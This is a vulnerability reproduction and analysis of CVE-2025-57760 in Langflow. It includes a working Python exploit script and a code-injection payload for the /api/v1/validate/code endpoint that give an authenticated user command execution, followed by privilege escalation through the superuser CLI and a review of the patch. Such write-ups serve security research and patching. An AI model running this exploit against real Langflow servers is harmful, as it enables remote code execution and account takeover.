Vulnerability Reproduction

Starting with Docker

    docker run -it --rm \
      -p 7860:7860 \
      -e LANGFLOW_ENABLE_AUTH=True \
      -e LANGFLOW_SUPERUSER=admin \
      -e LANGFLOW_SUPERUSER_PASSWORD=123456 \
      -e LANGFLOW_AUTO_LOGIN=False \
      -e LANGFLOW_SECRET_KEY=secretK3Y \
      -e LANGFLOW_NEW_USER_IS_ACTIVE=True \
      langflowai/langflow:1.4.0

╭─────────────────────────────────────────────────────────────────────────╮
│                                                                         │
│  Welcome to Langflow                                                    │
│                                                                         │
│  🌟 GitHub: Star for updates → https://github.com/langflow-ai/langflow  │
│  💬 Discord: Join for support → https://discord.com/invite/EqksyE2EX9   │
│                                                                         │
│  We collect anonymous usage data to improve Langflow.                   │
│  To opt out, set: DO_NOT_TRACK=true in your environment.                │
│                                                                         │
│  🟢 Open Langflow → http://0.0.0.0:7860                                 │
│                                                                         │
╰─────────────────────────────────────────────────────────────────────────╯

Note: set LANGFLOW_ENABLE_AUTH to enable authentication and turn off auto login. Otherwise, anyone who opens the UI is logged in as the superuser.


Registering a Low-Privilege User

Once the container is running, user registration is available. First register an ordinary user, testtest:123456.


Next, inspect the login request and its response.


The response shows that this user does not have superuser privileges.

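Next, execute commands through the /api/v1/validate/code endpoint. This endpoint was the subject of an earlier Langflow RCE vulnerability: in Langflow < 1.3.0 it accepted arbitrary Python code and executed it without authentication and without any sandbox. Version 1.3.0 fixed the unauthenticated access, but authenticated RCE is still possible.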

### Code Execution Vulnerability (Fixed in 1.3.0)

Langflow allows users to define and run **custom code components** through endpoints like `/api/v1/validate/code`. In versions < 1.3.0, this endpoint did not enforce authentication or proper sandboxing, allowing **unauthenticated arbitrary code execution**.

This means an attacker could send malicious code to the endpoint and have it executed on the server—leading to full system compromise, including data theft, remote shell access, or lateral movement within the network.

To address, upgrade to >= 1.3.0.

So in CVE-2025-57760, the attacker must be an authenticated user to achieve RCE through this endpoint, and then uses a CLI command to escalate privileges.

{"code": "\ndef run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass"}
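The payload works because Python evaluates default-argument expressions when a `def` statement is executed, not when the function is called. The following is a harmless sketch of that mechanism. It assumes the endpoint validates each function definition by compiling and executing the `def` statement itself; `validate_like` is a hypothetical stand-in written for illustration, not Langflow's code.

```python
import ast


def validate_like(code: str) -> list[str]:
    """Hypothetical validator: execute each top-level function definition
    and collect the messages of any exceptions raised while doing so."""
    errors = []
    tree = ast.parse(code)
    for node in tree.body:
        if isinstance(node, ast.FunctionDef):
            # Wrap the single definition in its own module and run it.
            module = ast.Module(body=[node], type_ignores=[])
            try:
                exec(compile(module, "<string>", "exec"), {})
            except Exception as exc:  # report the error like a validator would
                errors.append(str(exc))
    return errors


# The default value of `cd` is evaluated while the def statement runs,
# so the inner exec() fires even though run() is never called.
snippet = "def run(cd=exec('raise Exception(\"evaluated at definition time\")')): pass"
errors = validate_like(snippet)
print(errors)
```

The exception message travels back in the list of errors, which is why the payload above wraps the command output in `raise Exception(...)`: the error text becomes the output channel.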

RCE

Write an exploit that combines registration, login, and the call to the RCE endpoint:

import requests
import sys
import random
import string

def random_username(length=6):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def signup(base_url, username, password):
    url = f"{base_url}/api/v1/users/"
    payload = {"username": username, "password": password}
    r = requests.post(url, json=payload)
    print("[*] Signup:", r.status_code, r.text)
    return r

def login(base_url, username, password):
    url = f"{base_url}/api/v1/login"
    payload = {"username": username, "password": password}
    r = requests.post(url, data=payload)
    print("[*] Login:", r.status_code, r.text)
    data = r.json()
    access_token = data.get("access_token")
    cookies = r.cookies.get_dict()
    return access_token, cookies

def run_code(base_url, access_token, cookies, command):
    url = f"{base_url}/api/v1/validate/code"
    headers = {
        "Authorization": f"Bearer {access_token}",
        "Content-Type": "application/json"
    }
    code_payload = f"""
def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass
"""
    r = requests.post(url, headers=headers, cookies=cookies, json={"code": code_payload})
    print("[*] Validate:", r.status_code)
    print("[*] Response:", r.text)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <command>")
        sys.exit(1)

    command = sys.argv[1]
    base_url = "http://10.0.2.7:7860"
    username = random_username(6)
    password = "123456"

    print(f"[*] Using random username: {username}")
    signup(base_url, username, password)
    token, cookies = login(base_url, username, password)
    run_code(base_url, token, cookies, command)

Then spawn a reverse shell.


Privilege Escalation

Next comes the core of CVE-2025-57760: /app/.venv/bin/langflow superuser can create an arbitrary superuser, even though the shell was obtained through a low-privilege user.


Then try logging in to the web UI with the newly created user zhangsan/zhangsan.

The login succeeds, and we now hold a high-privilege account.

Analysis

Locate the superuser command:

@app.command()
def superuser(
    username: str = typer.Option(..., prompt=True, help="Username for the superuser."),
    password: str = typer.Option(..., prompt=True, hide_input=True, help="Password for the superuser."),
    log_level: str = typer.Option("error", help="Logging level.", envvar="LANGFLOW_LOG_LEVEL"),
) -> None:
    """Create a superuser."""
    configure(log_level=log_level)
    db_service = get_db_service()

    async def _create_superuser():
        await initialize_services()
        async with session_getter(db_service) as session:
            from langflow.services.auth.utils import create_super_user

            if await create_super_user(db=session, username=username, password=password):
                # Verify that the superuser was created
                from langflow.services.database.models.user.model import User

                stmt = select(User).where(User.username == username)
                user: User = (await session.exec(stmt)).first()
                if user is None or not user.is_superuser:
                    typer.echo("Superuser creation failed.")
                    return
                # Now create the first folder for the user
                result = await get_or_create_default_folder(session, user.id)
                if result:
                    typer.echo("Default folder created successfully.")
                else:
                    msg = "Could not create default folder."
                    raise RuntimeError(msg)
                typer.echo("Superuser created successfully.")

            else:
                typer.echo("Superuser creation failed.")

    asyncio.run(_create_superuser())

It first calls create_super_user:

async def create_super_user(
    username: str,
    password: str,
    db: AsyncSession,
) -> User:
    super_user = await get_user_by_username(db, username)

    if not super_user:
        super_user = User(
            username=username,
            password=get_password_hash(password),
            is_superuser=True,
            is_active=True,
            last_login_at=None,
        )

        db.add(super_user)
        await db.commit()
        await db.refresh(super_user)

    return super_user

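After fetching the user from the database, if no such user exists, the function creates a superuser with that username and adds it through the SQLAlchemy ORM add. Internally, add either saves or updates, depending on whether the instance already has an identity key: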

def _save_or_update_impl(self, state: InstanceState[Any]) -> None:
    if state.key is None:
        self._save_impl(state)
    else:
        self._update_impl(state)

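None of this involves any permission check, so an ordinary user with shell access can create a superuser directly. In the code as shown, add is reached only when the username does not yet exist, so an existing account is returned unchanged rather than overwritten.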
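To make the missing check concrete, here is a minimal in-memory model of the flow above. It is a sketch under stated assumptions, not Langflow's code: `FakeUser`, the dict-backed `db`, and the synchronous `create_super_user` are hypothetical stand-ins for the ORM model, the async session, and the real function, and password hashing is omitted.

```python
from dataclasses import dataclass


@dataclass
class FakeUser:
    """Hypothetical stand-in for the ORM User model."""
    username: str
    password: str
    is_superuser: bool = False


def create_super_user(db: dict, username: str, password: str) -> FakeUser:
    """Get-or-create, mirroring the branch structure of the excerpt above.
    Note what is absent: nothing identifies or authorizes the caller."""
    user = db.get(username)
    if user is None:
        user = FakeUser(username, password, is_superuser=True)
        db[username] = user
    return user


# The database already holds one ordinary user.
db = {"testtest": FakeUser("testtest", "123456")}

# A new username becomes a superuser with no questions asked.
created = create_super_user(db, "zhangsan", "zhangsan")

# An existing username is returned as-is; it is neither promoted nor changed.
existing = create_super_user(db, "testtest", "new-password")

print(created.is_superuser, existing.is_superuser, existing.password)
```

In this model the only thing standing between a caller and a new superuser is the ability to invoke the function, which is the situation a shell inside the container provides.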

Patch

@app.command()
def superuser(
    username: str = typer.Option(
        None, help="Username for the superuser. Defaults to 'langflow' when AUTO_LOGIN is enabled."
    ),
    password: str = typer.Option(
        None, help="Password for the superuser. Defaults to 'langflow' when AUTO_LOGIN is enabled."
    ),
    log_level: str = typer.Option("error", help="Logging level.", envvar="LANGFLOW_LOG_LEVEL"),
    auth_token: str = typer.Option(
        None, help="Authentication token of existing superuser.", envvar="LANGFLOW_SUPERUSER_TOKEN"
    ),
) -> None:
    """Create a superuser.

    When AUTO_LOGIN is enabled, uses default credentials.
    In production mode, requires authentication.
    """
    configure(log_level=log_level)

    asyncio.run(_create_superuser(username, password, auth_token))

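In the new version, the superuser command gains an auth_token parameter. It defaults to None and can be read from the LANGFLOW_SUPERUSER_TOKEN environment variable. The command then calls _create_superuser: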

settings_service = get_settings_service()
# Check if superuser creation via CLI is enabled
if not settings_service.auth_settings.ENABLE_SUPERUSER_CLI:
    typer.echo("Error: Superuser creation via CLI is disabled.")
    typer.echo("Set LANGFLOW_ENABLE_SUPERUSER_CLI=true to enable this feature.")
    raise typer.Exit(1)

If the ENABLE_SUPERUSER_CLI setting (controlled by LANGFLOW_ENABLE_SUPERUSER_CLI) is false, the command exits immediately and refuses to create a superuser.

if settings_service.auth_settings.AUTO_LOGIN:
    # Force default credentials for AUTO_LOGIN mode
    username = DEFAULT_SUPERUSER
    password = DEFAULT_SUPERUSER_PASSWORD
else:
    # Production mode - prompt for credentials if not provided
    if not username:
        username = typer.prompt("Username")
    if not password:
        password = typer.prompt("Password", hide_input=True)

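If LANGFLOW_AUTO_LOGIN is enabled, the username and password are forced to the default superuser credentials (DEFAULT_SUPERUSER and DEFAULT_SUPERUSER_PASSWORD, which the option help text gives as 'langflow'). With auto login on, users cannot log in as themselves: opening the UI logs in the superuser automatically, so whoever obtains a shell in that mode is already acting as the superuser.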

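If auto login is off, the username and password come from the user, who is prompted for any value not passed as an option.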

from langflow.services.database.models.user.crud import get_all_superusers

existing_superusers = []
async with session_scope() as session:
    # Note that the default superuser is created by the initialize_services() function,
    # but leaving this check here in case we change that behavior
    existing_superusers = await get_all_superusers(session)
is_first_setup = len(existing_superusers) == 0

It then fetches the list of all superusers from the database.

if settings_service.auth_settings.AUTO_LOGIN:
    if not is_first_setup:
        typer.echo("Error: Cannot create additional superusers when AUTO_LOGIN is enabled.")
        typer.echo("AUTO_LOGIN mode is for development with only the default superuser.")
        typer.echo("To create additional superusers:")
        typer.echo("1. Set LANGFLOW_AUTO_LOGIN=false")
        typer.echo("2. Run this command again with --auth-token")
        raise typer.Exit(1)

    typer.echo(f"AUTO_LOGIN enabled. Creating default superuser '{username}'...")
    typer.echo(f"Note: Default credentials are {DEFAULT_SUPERUSER}/{DEFAULT_SUPERUSER_PASSWORD}")
# AUTO_LOGIN is false - production mode
elif is_first_setup:
        typer.echo("No superusers found. Creating first superuser...")

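If there are currently no superusers, the first one is created without a token: with the default credentials in AUTO_LOGIN mode, or with the supplied username and password otherwise.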

If a superuser already exists and auto login is enabled, creating another superuser is refused.

else:
        # Authentication is required in production mode
        if not auth_token:
            typer.echo("Error: Creating a superuser requires authentication.")
            typer.echo("Please provide --auth-token with a valid superuser API key or JWT token.")
            typer.echo("To get a token, use: `uv run langflow api_key`")
            raise typer.Exit(1)

        # Validate the auth token
        try:
            auth_user = None
            async with session_scope() as session:
                # Try JWT first
                user = None
                try:
                    user = await get_current_user_by_jwt(auth_token, session)
                except (JWTError, HTTPException):
                    # Try API key
                    api_key_result = await check_key(session, auth_token)
                    if api_key_result and hasattr(api_key_result, "is_superuser"):
                        user = api_key_result
                auth_user = user

            if not auth_user or not auth_user.is_superuser:
                typer.echo(
                    "Error: Invalid token or insufficient privileges. Only superusers can create other superusers."
                )
                raise typer.Exit(1)
        except typer.Exit:
            raise  # Re-raise typer.Exit without wrapping
        except Exception as e:  # noqa: BLE001
            typer.echo(f"Error: Authentication failed - {e!s}")
            raise typer.Exit(1) from None

If auto login is off and a superuser already exists, an --auth-token must be supplied to create another superuser.

async def get_current_user_by_jwt(
    token: str,
    db: AsyncSession,
) -> User:
    settings_service = get_settings_service()

    if isinstance(token, Coroutine):
        token = await token

    secret_key = settings_service.auth_settings.SECRET_KEY.get_secret_value()
    if secret_key is None:
        logger.error("Secret key is not set in settings.")
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            # Careful not to leak sensitive information
            detail="Authentication failure: Verify authentication settings.",
            headers={"WWW-Authenticate": "Bearer"},
        )

    try:
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            payload = jwt.decode(token, secret_key, algorithms=[settings_service.auth_settings.ALGORITHM])
        user_id: UUID = payload.get("sub")  # type: ignore[assignment]
        token_type: str = payload.get("type")  # type: ignore[assignment]
        if expires := payload.get("exp", None):
            expires_datetime = datetime.fromtimestamp(expires, timezone.utc)
            if datetime.now(timezone.utc) > expires_datetime:
                logger.info("Token expired for user")
                raise HTTPException(
                    status_code=status.HTTP_401_UNAUTHORIZED,
                    detail="Token has expired.",
                    headers={"WWW-Authenticate": "Bearer"},

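The token is first decoded as a JWT. The signing key is the LANGFLOW_SECRET_KEY supplied through the environment, and the algorithm is HS256. Decoding the JWT yields the user id, which is then looked up in the database to get the user.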

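If decoding fails, the token is treated as an API key and looked up in the database. The resulting user must have is_superuser set for authentication to succeed and superuser creation to proceed.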
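The JWT branch described above comes down to an HMAC-SHA256 check over the token's header and payload. The sketch below shows that check using only the standard library. It is not the library code Langflow calls; the helper names (`sign_hs256`, `verify_hs256`) and the demo secret are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the stripped padding before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Build header.payload.signature with an HMAC-SHA256 signature."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def verify_hs256(token: str, secret: str) -> dict:
    """Recompute the signature, compare in constant time, then check expiry."""
    signing_input, _, sig_part = token.rpartition(".")
    expected = hmac.new(secret.encode(), signing_input.encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_part)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(signing_input.split(".")[1]))
    if "exp" in payload and time.time() > payload["exp"]:
        raise ValueError("token expired")
    return payload


# Demo values only: the claim names mirror the excerpt ("sub", "type", "exp").
token = sign_hs256({"sub": "user-1", "type": "access", "exp": int(time.time()) + 60}, "demo-secret")
print(verify_hs256(token, "demo-secret")["sub"])
```

Because HS256 is symmetric, whoever knows the secret can both verify and produce tokens, so the integrity of this check rests entirely on the secret staying private and being hard to guess.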

The defense strategy is:

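1. With LANGFLOW_AUTO_LOGIN enabled, the superuser command may not create additional superusers.
2. With LANGFLOW_AUTO_LOGIN disabled, a valid token must be supplied for authorization, and superuser creation is allowed only if that check passes.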
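The patched control flow walked through above can be condensed into one pure function. This is a sketch of the decision logic as read from the excerpts, not the actual implementation: the function name, parameters, and return strings are hypothetical, and token validation is reduced to a single boolean.

```python
def superuser_cli_decision(
    enable_cli: bool,
    auto_login: bool,
    existing_superusers: int,
    token_user_is_superuser: bool = False,
) -> str:
    """Return 'allow: ...' or 'deny: ...' for a superuser creation attempt."""
    if not enable_cli:
        return "deny: CLI superuser creation disabled"
    first_setup = existing_superusers == 0
    if auto_login:
        # Development mode: only the default superuser may ever exist.
        if first_setup:
            return "allow: default superuser"
        return "deny: no additional superusers under AUTO_LOGIN"
    if first_setup:
        # Bootstrapping: nobody exists yet who could vouch for the caller.
        return "allow: first superuser"
    if token_user_is_superuser:
        return "allow: authorized by superuser token"
    return "deny: valid superuser token required"


# The scenario from this write-up: auth enabled, a superuser already exists,
# and the caller holds only a shell, not a superuser token.
print(superuser_cli_decision(True, False, 1, token_user_is_superuser=False))
```

Laid out this way, the only unauthenticated path that remains is the first-setup case, where no superuser exists yet.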

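The length of the secret key looks like a remaining weak point: a short LANGFLOW_SECRET_KEY makes the HS256 signature easier to brute-force offline.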